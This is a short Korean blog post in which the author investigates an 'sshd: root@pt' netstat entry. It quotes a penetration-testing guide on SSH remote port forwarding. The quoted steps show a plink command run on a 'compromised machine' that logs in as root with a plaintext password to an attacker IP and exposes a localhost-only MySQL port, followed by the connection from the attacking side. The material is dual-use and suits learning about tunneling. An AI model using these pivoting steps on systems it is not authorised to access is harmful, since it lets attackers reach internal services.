netstat에서 다음과 같은 신기한게 있어서 검색

sshd: root@pt 


아무튼.. 원격에서 ssh를 통해서 포트포워딩 해서 쓸 수 있도록 하는거 같은데..

한개의 포트라면 이게 더 깔끔 하려나?

Remote port forwarding

Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MYSQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as following:


Here is how you create a remote port forwarding:

ssh <gateway> -R <remote port to bind>:<local host>:<local port>


By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is 111.111.111.111.


Step 1 So on our compromised machine we do:

plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306


Step 2 Now we can check netstat on our attacking machine, we should see something like this:

tcp        0      0 127.0.0.1:3307          0.0.0.0:*               LISTEN      19392/sshd: root@pt

That means what we can connect to that port on the attacking machine from the attacking machine.


Step 3 Connect using the following command:

mysql -u root -p -h 127.0.0.1 --port=3307 


[링크 : https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html]

'프로그램 사용 > ssh scp sftp' 카테고리의 다른 글

ssh blowfish  (0) 2019.09.24
ssh tunnel proxy  (0) 2019.09.20
ssh remote port forwarding  (0) 2019.01.28
reverse SSH  (0) 2018.05.14
rpi vpn client  (0) 2018.05.11
scp: ambiguous target 에러  (0) 2016.09.21
Posted by 구차니

댓글을 달아 주세요